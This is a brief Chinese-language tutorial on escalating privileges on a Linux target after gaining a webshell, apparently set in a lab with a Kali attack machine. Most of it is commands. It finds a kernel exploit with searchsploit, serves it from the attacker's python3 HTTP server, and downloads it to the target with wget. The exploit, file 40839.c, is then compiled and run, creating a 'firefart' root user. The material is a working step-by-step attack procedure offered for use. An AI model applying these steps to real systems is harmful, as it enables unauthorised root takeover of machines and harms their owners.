为什么要进行提权?
我们通常拿到的webshell大部分都是普通用户,有些文件没有权限操作,这个时候我们就要进行提权了。
操作要求
一台攻击机 kali
一台靶机 linux
操作步骤:
1.查看靶机的内核版本
uname -a
uname -r
2.kali搜索该版本的漏洞
searchsploit 2.6.32
3.kali下载可利用漏洞的版本
searchsploit -m+版本号
(先测试debian版本在测试其他)
4.kali开启python3远程下载端口
python3 -m http.server
5.靶机下载
wget+kali ip +端口 / +利用漏洞版本号
gcc -pthread 40839.c -o 40839 -lcrypt
解析一下
6.给利用漏洞加权限
chmod +x 40839
然后直接执行
./40839
会自动创建一个firefart用户
设置一个密码
7.切换到firefart
su firefart
密码为刚才设置的